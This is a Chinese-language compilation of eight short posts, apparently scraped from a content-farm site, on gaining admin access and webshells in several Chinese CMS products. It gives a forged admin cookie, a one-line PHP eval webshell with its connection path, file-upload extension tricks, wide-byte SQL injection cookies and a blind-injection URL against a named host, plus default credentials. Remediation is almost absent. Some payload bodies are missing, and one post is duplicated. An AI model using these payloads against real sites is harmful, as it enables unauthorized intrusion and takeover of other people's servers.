淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

下面小编为大家带来淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警，本文共8篇，希望大家喜欢!

篇1：淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警

偶然发现的淘客帝国免费版的后台可以cookie欺骗

工具：  老兵的cookie'欺骗工具

关键字： 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ，然后再工具的地址栏那里输入网站的后台（默认后台/admin）等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了，进入后台后怎么样拿shell就简单了，这里就不说了..

补下代码【anfli 补】

getshell 简单 系统配置 {${@eval($_POST['cmd'])}} 一句话连接地址/data/configdata.php

顺便补一下代码===================|The End}

##admin目录下php 部验证##

--------------------main.php

require_once '../include/adminfunction.php';

checkadmin;

---------------------/include/sysfunction.php

#####

function checkadmin(){

global $COOKIEadminuser;

global $sitetitleurl;

//判断

if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!=“”) || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!=“”) ){

} else {

echo(“”);

exit;

}

一看就懂

$_COOKIE['COOKIEadminuser']!=“” 只要不为空就ok

//index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 .........COOKIEadminuser是干神马的？

/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空

if($action==“loginout”){

$_SESSION['adminuser'] = “”;

SetCookie(“adminuser”, “”);

redirect_to($sitetitleurl);

其实所有审计过程 是倒序

​

篇2：常用的后台上传拿shell漏洞预警

有的时候进入后台了，拿shell也可能是你羁绊，有编辑器的话，再具体说吧，万一编辑器是精简版的或者是漏洞修补的FCK，只能利用一些小的上传点了，可不要小看这些上传点。

能不能利用的NC提交，其实NC提交已经反锁了，利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢，看源代码

出现类似filepath value=”upload”就爽歪歪了，试着修改value=“upload.asp;”

出现类似filename value =”1312321321″  ，试着修改value=”1312321321.asp”

如果还不行的可是在后面加上一个空格或者;试试

​

篇3：帝国cms 7.0 后台拿shell漏洞预警

帝国CMS7.0后台可上传mod后缀的PHP文件并执行里面的php代码，

进入后台~！

方法一：系统——数据表与系统模型——管理数据表 再随意选择一个数据表，打开对应数据表的“管理系统模型”如图：

“导入系统模型”，可进入“LoadInM.php”页面，如图：

在本地新建一个文件，文本内容为

再命名为1.php.mod，导入这个mod文件，即执行里面的php代码，在ecmsmod.php的相同目录下生产x.php的一句话木马文件，

可以从导入系统模型源文件中查看到,如图：

方法二：

在本地新建一个info.php（任意php文件）其源码内容为

再重名名为info.php.mod，将此文件按照方法一导入系统模型

即可执行info.php.mod的代码并显示在页面上，迅速查看源码即可得知网站根目录的绝对路径,如图：

info.php.mod的源码

然后

系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码：

即可在网站根目录生成 z.php 菜刀连接即可~！

​

篇4：IdeaCMS2.1 建站系统后台拿shell漏洞预警

这个建站系统还不错，从后台来看是仿马克思的cms

后台--系统--网站配置-- 随便找个位置插入闭合式一句话，

连接地址：localhost/inc/config.asp

再用菜刀连接就OK了

篇5：dedecms 5.7后台拿SHELL漏洞漏洞预警

漏洞说明：dedecms 5.7教之前的版本有了很大的改进，修复了5.6以下版本严重的上传0day；相当的鸡肋，前提是有了后台权限，由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名，导致直接写入webshell漏洞。

方法一见：dedecms5.7拿SHELL漏洞即修复

关键词：Powered by DedeCMSV57_GBK

漏洞测试：

1、进入后台，默认的是dede，www.cnc.net/dede，左边导航栏目，选择模块>辅助插件>文件管理器(系统默认安装的，如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传)……

如上图：文件名称随便填，例如1.php；内容出填写一句话；菜刀连接，

下面的上传也一样，没有过滤文件扩展名，导致上传任意文件。

漏洞修复：

DEDECMS安全性终极设置

漏洞相关：

DedeCms 5.7 两处XSS跨站漏洞

dedecms5.7拿SHELL漏洞即修复

DedeCMS鸡肋漏洞之任意修改文章

DedeCms v5.6 恶意代码执行漏洞

织梦(DedeCMS)支付页面SQL注入漏洞

篇6：dedecms 5.7后台拿SHELL漏洞

dedecms 5.7教之前的版本有了很大的改进，

修复了5.6以下版本严重的上传0day；

相当的鸡肋，前提是有了后台权限，

由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名，

导致直接写入webshell漏洞。

方法一见：dedecms5.7拿SHELL漏洞即修复

漏洞测试：

1、进入后台，默认的是dede，www.kuqin.com/dede，

左边导航栏目，选择模块>辅助插件>文件管理器

(系统默认安装的，如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传)……

如上图：文件名称随便填，例如1.php；内容出填写一句话；菜刀连接，

下面的上传也一样，没有过滤文件扩展名，导致上传任意文件。

篇7：骑士cms注入及后台拿shell漏洞预警

0x1 任意用户登录

0x2 盲注

0x3 后台拿shell

0x4 随机函数问题

详细说明：

0x1 任意用户登录

user/login.php

elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])

{

if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))

{

update_user_info($_COOKIE['QS']['uid'],false,false);

header(“Location:”.get_member_url($_SESSION['utype']));

}

else

{

unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION[“openid”]);

setcookie(“QS[uid]”,“”,time - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[username]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie('QS[password]',“”, time() - 3600,$QS_cookiepath, $QS_cookiedomain);

setcookie(“QS[utype]”,“”,time() - 3600,$QS_cookiepath, $QS_cookiedomain);

header(“Location:”.url_rewrite('QS_login'));

}

}

include/fun_user.php

//检测COOKIE

function check_cookie($name,$pwd){

global $db;

$row = $db->getone(“SELECT COUNT(*) AS num FROM ”.table('members').“ WHERE username='{$name}' and password = '{$pwd}'”);

if($row['num'] > 0)

{

return true;

}else{

return false;

}

}

构造cookie如下

QS[uid] 2

QS[utype]   1

QS[password]   111111111111111111111

QS[username]%bf%27 or 1=1 %23

uid 为假冒用户的ID utype为用户类型password任意

0x2 盲注

demo32.74cms.com//resume/resume-list.php?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23

上面两个都是宽字节注入,如果你能猜出管理员密码，还能解出双重md5的话，还能猜出后台路径，继续看下面

0x3 后台拿shell

1.先关闭csrf防御功能

2.在hr工具箱中添加一个伪造的doc，内容为

3.在工具-计划任务中添加任务，脚本任务填../../data/hrtools//06/1339941553308.doc

4.然后执行

0x4 随机函数问题(几乎可以无视，纯属个人YY)

在admin_common.fun.inc.php中有个$QS_pwdhash是在安装的时候赋值的，只要能猜出就可已不用解双重md5了，

骑士cms注入及后台拿shell漏洞预警

，

这个$QS_pwdhash是由randstr生成

function randstr($length=6)

{

$hash='';

$chars= 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz@#!~?:-=';

$max=strlen($chars)-1;

mt_srand((double)microtime()*1000000);

for($i=0;$i<$length;$i++) {

$hash.=$chars[mt_rand(0,$max)];

}

return $hash;

}

生成长度为6的随机数，mt_srand()播种一样，就会得到一样的随机数，所以我们最多要猜1000000次就可以了（ ）

漏洞证明：

修复方案：

do it yourself~

作者yy520

篇8：维博天下CMS后台拿shell漏洞预警

关键字：Powered by CNKSYS

后台地址：admin

默认账号密码：admin admin

拿shell方法：

随便找个地方，上传一句话图片马，重命名为xx.asp

ps:后面小菜发现：这个程序貌似是改头换面的，

维博天下CMS后台拿shell漏洞预警

，

。。。

★Discuz!7.07.2后台settings.inc.php中写shell漏洞

★天天团购后台Getshell安全问题漏洞预警

★XPSHOP商城系统Cookies欺骗漏洞漏洞预警

★bluecms版本双字节密码进后台漏洞预警

★iShowMusic V1.2 写入shell漏洞漏洞预警

★阿曼达企业网站系统 cookie 注入漏洞0day漏洞预警

★启航企业建站系统 cookie注入漏洞通杀所有版本漏洞预警

★青创文章系统简单分析漏洞预警

★优酷开放平台存储型XSS脚本攻击漏洞成功劫持后台漏洞预警

《淘客帝国系统后台cookie欺骗漏洞及后台拿shell漏洞预警（精选8篇）.doc》

将本文的Word文档下载到电脑，方便收藏和打印

推荐度：

点击下载文档

文档为doc格式